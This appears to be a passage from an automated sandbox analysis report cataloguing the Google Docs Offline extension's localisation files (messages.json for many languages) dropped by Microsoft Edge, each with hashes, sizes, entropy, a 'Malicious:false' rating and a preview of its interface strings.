                                                                                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1063
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                        MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                        SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                        SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                        SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                        MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                        SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                        SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                        SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1263
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                        MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                        SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                        SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                        SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1074
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                        MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                        SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                        SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                        SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):879
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                        MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                        SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                        SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                        SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1205
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                        MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                        SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                        SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                        SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1312043457\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
